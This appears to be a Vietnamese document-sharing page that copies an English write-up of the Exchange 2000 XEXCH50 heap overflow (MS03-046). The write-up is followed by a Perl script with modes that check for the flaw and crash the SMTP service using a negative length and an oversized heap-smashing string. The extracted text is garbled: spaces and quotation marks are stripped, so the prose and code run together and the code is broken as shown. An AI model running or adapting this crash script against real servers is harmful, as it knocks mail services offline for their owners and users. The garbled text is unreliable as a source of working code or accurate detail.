Khai thác lỗi tràn heap trên Microsoft Exchange 2000

On October 15th, Microsoft released an advisory stating that both Exchange5.5 and Exchange 2000 were vulnerable to a denial of service attack inthe code which processes extended verb requests. This advisory alsostated that Exchange 2000 was vulnerable to a buffer overrun that wouldallow a remote attacker to execute the code in the context of the SMTPservice.
Nội dung trích xuất từ tài liệu:
Khai thác lỗi tràn heap trên Microsoft Exchange 2000KhaitháclỗitrànheaptrênMicrosoftExchange2000trangnàyđãđượcđọc lầnĐôinétvềlỗinày:OnOctober15th,MicrosoftreleasedanadvisorystatingthatbothExchange5.5andExchange2000werevulnerabletoadenialofserviceattackinthecodewhichprocessesextendedverbrequests.ThisadvisoryalsostatedthatExchange2000wasvulnerabletoabufferoverrunthatwouldallowaremoteattackertoexecutethecodeinthecontextoftheSMTPservice.ThesupportedextendedverbrequestscanbedeterminedbysendingtheEHLOcommandtotheSMTPservice.Aftercheckingboththe5.5and2000versionsoftheExchangeSMTPservice,itwasobviousthattheproblemhadtobewiththeXEXCH50verb.AquickgooglesearchandIwasabletofindaquickdescriptionofthisverb:Fromhttp://smtpfilter.sourceforge.net/esmtp.html:AllowstransferofbinarydatawithExchangespecificrecipientinformationegplaintextonlyversusMIME,etc).Ifaccepted,receiverSMTPserverssends354SendBinarydataandsendingSMTPserversendsthenumberofbytesasthefirstparameterontheXEXCH50command.Oncethesebytesaresent,thereceivingSMTPserversendsanacknowledgmentAfterafewminutesofdiggingongooglegroups,IcameacrossasampleTCPsessionshowinghowtheXEXCH50verbisused.ThisverbisusedtotransfermessagesbetweenExchangeserversusingtheirnativeenvelopeformat.Thesyntaxoftheverbis:XEXCH50WhereXisthelengthofthemessageandYalwaysseemstobethenumber2(althoughothersmallintegervaluesworkaswell).ThedenialofservicecanbetriggeredbysendingXEXCH50requestwithamassivenumberofbytesforthefirstargument.Thisforcestheremoteservertoallocatethatspecifiedamountofspaceandcaneasilybeusedtodrainallavailablememoryfromasystem.OnceExchangerunslowonmemory,itnolongerprocessesincomingrequests,leadingtoaquickandeasyremotedenialofservice.IfanegativevalueispassedasthefirstargumentoftheXEXCH50verbrequest,theserverwillnotallocateanymemorybutstillacceptdata.Thiscanbeusedtoclobbertheheapandeventuallyexecutearbitrarycode...ItendsupthattheheapareathatisoverwrittenisusedbytheGetServiceConfigInfoSizeroutineandmanyofthesubroutinesthatitcalls.Aftertestingmorethantwohundredcombinationsofdatasize,datacontent,preallocation,multipleconnections,andalternatetriggerpaths,Iwasunabletofindasetthatwouldallowforreliableexploitation.UsingtheSnapshot/RevertfunctionsofVMWareallowedmetotestdifferentdatacombinationsintheexactsamerunningprocess.Justchangingafewbytesdeepintothedataresultedinachangeinthelocationandtypeofcrash.Evenusingtheexactsamedatawillresultinsmallersetofcompletelydifferentcrashesusingdifferentchunksofthedata.Soforthemoment,Ihavenoworkingexploit.Morethanlikelysomeonewillfindtheperfectsetofparametersandbeabletowriteareliableexploit,butinthemeantimeIamgoingtoburnmytimeonsomethingmorefulfillingYoucanfindasmallperlscriptthatreproducesthecrashandtestsforthevulnerabilityattheURLbelow.http://metasploit.com/releases.htmlCODEkhaithác:#!/usr/bin/perlw#####################ms03046.plhdm[at]metasploit.com##usestrict;useIO::Socket;my$host=shift()||usage();my$mode=shift()||CHECK;my$port=25;if(uc($mode)eqCHECK){check()}if(uc($mode)eqCRASH){crash()}usage();subcheck{my$s=SMTP($host,$port);if(!$s){print[*]ErrorestablishingconnectiontoSMTPservice.\n;exit(0);}print$sXEXCH5022\r\n;my$res=;close($s);#apatchedserveronlyallowsXEXCH50afterNTLMauthenticationif($res=~/authentication/i){print[*]Thisserverhasbeenpatchedorisnotvulnerable.\n;exit(0);}print[*]Thissystemisvulnerable:$host:$port\n;exit(0);}subcrash{my$s=SMTP($host,$port);if(!$s){print[*]ErrorestablishingconnectiontoSMTPservice.\n;exit(0);}#thenegativevalueallowsustooverwriterandomheapbitsprint$sXEXCH5012\r\n;my$res=;#apatchedserveronlyallowsXEXCH50afterNTLMauthenticationif($res=~/authentication/i){print[*]Thisserverhasbeenpatchedorisnotvulnerable.\n;exit(0);}print[*]Sendingmassiveheapsmashingstring...\n;print$s(METAx16384);#sometimesasecondconnectionisrequiredtotriggerthecrash$s=SMTP($host,$port);exit(0);}subusage{printSTDERRUsage:$0[CHECK|CRASH]\n;exit(0);}subSMTP{my($host,$port)=@_;my$s=IO::Socket::INET>new(PeerAddr=>$host,PeerPort=>$port,Proto=>tcp)||return(undef);my$r=;returnundefif!$r;if($r!~/Microsoft/){chomp($r);printSTDERR[*]Thisdoesnotlooklikeanexchangeserver:$r\n;return(undef);}print$sHELOX\r\n;$r=;returnundefif!$r;print$sMAILFROM:DoS\r\n;$r=;returnundefif!$r;print$sRCPTTO:Administrator\r\n;$r=;returnundefif!$r;return($s);} ...